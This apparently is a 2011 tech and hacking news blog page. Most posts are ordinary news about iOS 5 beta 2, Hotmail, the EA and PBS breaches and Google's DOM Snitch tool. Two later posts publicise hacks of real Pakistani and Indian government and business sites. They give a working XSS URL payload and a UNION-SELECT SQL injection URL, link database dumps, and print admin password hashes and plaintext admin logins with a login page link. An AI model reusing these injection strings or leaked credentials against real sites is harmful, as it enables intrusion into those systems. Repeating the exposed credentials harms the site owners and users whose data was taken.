Posted by Avik Sarkar
On 6/26/2011 02:09:00 am
Apple today released the second beta version of its iOS 5 mobile operating system to its iOS developer website, as well as the second beta of iTunes 10.5, which is needed to test one of iOS 5′s biggest new features: wireless syncing. And so far, the developer’s reviews give the new feature two big thumbs up. The build number of iOS 5 beta two is listed as 9A5248d. Apple has released a total of nine separate builds of the beta OS: three for iPad 2 (WiFi-only, GSM, CDMA), one for the original iPad, two for iPhone 4 (GSM, CDMA), one for iPhone 3GS and two for the iPod touch (third and fourth generation). No other devices will be able to run iOS 5 when its official release. (Sorry iPhone 3G users).
To use the new wireless syncing features, users must have the newest iOS 5, iTunes 10.5 beta 2, and a Mac running Mac OS X 10.6.8 or OS X Lion. Users must then connect their device to their Mac with a USB cable for the the very last time. This will allow them to choose the wireless sync option. Once that’s done, the USB can be stored safely away.
The iOS 5 beta 2 release also now allows any Apple ID to be used to create an iCloud account. (The beta 1 version required a MobileMe account.) A new version of iMessage is included in beta 2. And that version is not backward-compatible with the iMessage version in beta 1. Also, developers must take note that once the beta 2 version of iOS 5 is installed, they can only update to newer beta versions, and cannot revert back to the first beta version.
In addition to iOS 5 beta 2 and iTunes 10.5 beta 2, Apple also released a second beta version of AppleTV 2.0 software and a developer preview of XCode 4.2.
Apple will officially release iOS 5 to the public sometime this fall.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/25/2011 06:38:00 pm
It's not as titillating as the time Microsoft added conversation view to Hotmail, but the outfit didjust freshen up its email service with a handful of helpful tweaks. Topping the list is an assortment of shortcuts, including the ability to right click a message to reply, reply all, or forward (you could already do this for other things, like marking something as unread). Hotmail also now responds to some additional Gmail- and Yahoo Mail-specific keyboard shortcuts, such as "#" for deleting messages -- a Gmail trick. And the company is none too subtle about admitting it wants the service to be user-friendly for folks if -- or when -- they switch from Google or Yahoo. Rounding out the batch of improvements, you get an easy way to recover deleted emails, an improved back button, HTML5-fueled speed improvements, and the option of changing your default font signature -- something we can't believe Hotmail has been missing until now. Hit the source link for the full spill, and find a short demo video after the break.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/25/2011 06:11:00 pm
Electronic Arts (EA) said in an undated Q&A post on its site that no credit card data was compromised, nor was any other "sensitive information" like social security numbers. But information including user names, encrypted passwords, email addresses, mailing addresses, names, phone numbers, and birth dates may have been stolen, the company added. Add Electronic Arts to the ever-growing hack list. The video game maker revealed that hackers recently breached a server linked to a message board, stealing customer information in the process. The attack on the BioWare Neverwinter Nights message board server was "highly sophisticated and unlawful," Electronic Arts wrote, adding that the company had secured the affected server and was investigating the breach. A representative for Electronic Arts did not immediately respond to a request for comment on how many people were affected by the hack.
For More Information Click Here
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/25/2011 06:10:00 pm
The affected website was for the program "Becoming American." Bentley says a "very small number" of administrative user names and encrypted passwords were stolen.PBS spokeswoman Anne Bentley says one section of a website in the PBS collection of sites was defaced Friday. PBS says its website has been hacked for at least the second time in a month - the latest in a string of intrusions into such sites as Sony, Lockheed Martin, Nintendo and others. At the end of May, hackers broke into the PBS website and posted a phony story claiming the late rapper Tupac Shakur was alive. A group that claimed responsibility complained about a recent "Frontline" investigation on Wikileaks.Arlington, Va.-based PBS says it has seen an increasing number of intrusion attempts recently.
Apparently retaliating for a recent Frontline program about WikiLeaks, the group, which calls itself @LulzSec or The Lulz Boat, also disclosed passwords and e-mail addresses held by PBS on the public bulletin board Pastebin.com.Shakur died in a shooting in Las Vegas in 1996. Smalls, whose real name was Christopher George Latore Wallace, was gunned down the following year in a Los Angeles drive-by shooting.By Monday morning, the fake story, which had appeared on The RunDown under the byline PBS WebTech, was gone. But a cached version remains available:"Prominent rapper Tupac has been found alive and well in a small resort in New Zealand, locals report. The small town - unnamed due to security risks - allegedly housed Tupac and Biggie Smalls (another rapper) for several years. One local, David File, recently passed away, leaving evidence and reports of Tupac's visit in a diary, which he requested be shipped to his family in the United States."A hacker group posted a bogus report on the PBS website on Saturday evening that claim slain rappers Tupac Shakur and Biggie Smalls were actually alive and residing in New Zealand.
According to the Australian publication Secure Business Intelligence, LulzSec had earlier targeted Fox News and the X-Factor television show.
In explaining its motivation, "LulzSec" put out a statement: "Greetings, Internets. We just finished watching WikiSecrets and were less than impressed. We decided to sail our Lulz Boat over to the PBS servers for further... perusing. As you should know by now, not even that fancy-ass fortress from the third shitty Pirates of the Caribbean movie (first one was better!) can withhold our barrage of chaos and lulz. Anyway, unnecessary sequels aside... wait, actually: second and third Matrix movies sucked too! Anyway, say hello to the insides of the PBS servers, folks. They best watch where they're sailing next time."
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/25/2011 04:47:00 pm
Google has released a Chrome extension that is capable of checking client-side code for cross-site scripting weaknesses and other security issues. Called DOM Snitch, the still-experimental extension intercepts JavaScript calls to potentially dangerous functions like document.write, document.cookie, HTMLElement.innerHTML and others. It records a complete stack trace allowing the user to determine if the calls can lead to cross-site scripting, mixed content, violations of the same-origin DOM policy and other issues. "DOM Snitch is intended for use by developers, testers, and security researchers alike," says Radoslav Vasilev, a Google security test engineer. The benefits of DOM Snitch include the ability to inspect DOM modifications in real-time without the need of debuggers, built-in security heuristics and nested views, as well as export capability. The easy exporting of captured DOM modifications enables developers to ask for help from their peers when troubleshooting issues. DOM Snitch is not the only security tool released by Google for developers. Its open source Skipfish and Ratproxy web application vulnerability scanners are also capable of detecting XSS, XSRF and other flaws.
JavaScript is a critical component in many web attacks, both client-side and server-side. It is used in most drive-by exploits, as well as to obfuscate malicious code on compromised websites. There are several types of cross-site scripting vulnerabilities. Persistent ones are most dangerous because they can be exploited to insert rogue code into pages permanently. Non-persisted or reflected ones can only be exploited by tricking users into opening malformed URLs.
DOM-based XSS flaws like the ones DOM Snitch helps identify are more complicated and can be exploited to load non-HTML code from a server or write code into the page directly on the client-side.
For More Info and to Download Click HERE
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by VOGH
On 6/25/2011 01:56:00 pm
11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed Data Base and Credentials of Admins.
List Of Vulnerable Sites:-
http://www.awt.com.pk/
http://www.unapakistan.org.pk/
www.psf.gov.pk
www.commerce.gov.pk
http://www.whatmobile.com.pk/
http://www.competitiveness.org.pk/
http://www.whatmobile.com.pk/
http://www.smeda.org.pk/
http://www.shifa.com.pk/
http://www.gallup.com.pk/
http://www.onlinenews.com.pk/
www.phonebook.com.pk
Here are the details of those Sites:-
1) Army welfare trust of Pakistan Hacked by zero
Hacked website :-
http://www.awt.com.pk/news_detail.php?news_id=9
Mirror link:-
http://mirror.sec-t.net/defacements/?id=44797
2) XSS Vulnerablity in United Nations Association of Pakistan
link:-
http://www.unapakistan.org.pk/search.php?search=%3E%22%3E%3Cscript%3Ealert%28%22ZERO%20WAS%20HERE%22%29%3C/script%3E§ion=Whole+Site&x=24&y=1
3) Pakistan Science foundation is vul to sql-i
Data Base:-
http://pastebin.com/XCtn8Ksw
4) government of pakistan Ministry of Commerce is vulnerable to sql-i
| admin | $P$BCr2kHTn8oXYjZ.z2AabI56aSgo7gs. |
| khushnaam | $P$BtJsGbrR1l0.IYsv9a1tJhwkjMMYO/. |
Data Base:-
http://pastebin.com/WKwP68HC
5) civildefence of pakistan vul to sqli found by zero
Data Base:-
http://pastebin.com/HsXvQAGA
6) http://www.shifa.com.pk/ is vulnerable to sql-i
Data Base:-
http://pastebin.com/8r2vqqYF
7) http://www.smeda.org.pk/ is vulnerable to sql-i
Database:-
http://pastebin.com/7Xukb7cH
8) http://www.gallup.com.pk/ vulnerable to sql-i
Data Base:-
http://pastebin.com/3vNLAmry
9) http://www.onlinenews.com.pk/ vulnerable to sql-i
| 3e8edbe7d481ca8ba452ae92631a905e | admin |
| 4bc2cfed02b6bebf99b6646c82cec3b8 | admin |
Data Base:-
http://pastebin.com/y7Vt0zSC
10) http://www.whatmobile.com.pk/ vulnerable to sql-i
user: aamir
pass:NoMoreBullShit81
Data Base:-
http://pastebin.com/TzTMjKYK
11) http://www.competitiveness.org.pk/ vulnerable to sql-i
Vulnerable Link:-
http://www.competitiveness.org.pk/subpage.php?pageid=-21+union+select+1,concat%28admin_name,0x3a,admin_password%29,3,4,5,6,7,8,9+FROM+tbl_admin--
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/24/2011 10:31:00 pm
ErroR &
Aiyoo Hacker of Team Greyhat Found serious SQL-i Vulnerability in the Official Website of Public Health Engineering Department Govt. of West Bengal
He also Exposed The Admin credentials of that Site.
Admin Account:-
User Name:- superadmin
Password:- wbphed@#22486312
Admin Login Link:- http://www.wbphed.gov.in/applications/Admin/restrictedzone.php
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
